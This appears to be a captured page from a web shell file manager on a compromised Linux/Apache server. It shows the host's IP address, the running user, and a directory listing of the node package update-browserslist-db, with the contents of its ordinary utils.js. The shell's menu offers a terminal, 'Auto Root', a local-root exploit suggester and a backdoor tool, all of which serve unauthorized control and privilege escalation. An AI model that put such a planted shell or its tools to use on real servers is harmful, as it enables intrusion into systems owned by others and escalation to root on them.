Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
update-browserslist-db /
Delete
Unzip
Name
Size
Permission
Date
Action
check-npm-version.js
354
B
-rw-r--r--
2023-12-22 10:30
cli.js
912
B
-rwxr-xr-x
2023-12-22 10:30
index.d.ts
143
B
-rw-r--r--
2023-12-22 10:30
index.js
8.79
KB
-rw-r--r--
2023-12-22 10:30
package.json
2.32
KB
-rw-r--r--
2023-12-22 10:30
pnpm-lock.yaml
69.85
KB
-rw-r--r--
2023-12-22 10:30
utils.js
689
B
-rw-r--r--
2023-12-22 10:30
Save
Rename
const { EOL } = require('os') const getFirstRegexpMatchOrDefault = (text, regexp, defaultValue) => { regexp.lastIndex = 0 // https://stackoverflow.com/a/11477448/4536543 let match = regexp.exec(text) if (match !== null) return match[1] return defaultValue } const DEFAULT_INDENT = ' ' const INDENT_REGEXP = /^([ \t]+)[^\s]/m module.exports.detectIndent = text => getFirstRegexpMatchOrDefault(text, INDENT_REGEXP, DEFAULT_INDENT) module.exports.DEFAULT_INDENT = DEFAULT_INDENT const DEFAULT_EOL = EOL const EOL_REGEXP = /(\r\n|\n|\r)/g module.exports.detectEOL = text => getFirstRegexpMatchOrDefault(text, EOL_REGEXP, DEFAULT_EOL) module.exports.DEFAULT_EOL = DEFAULT_EOL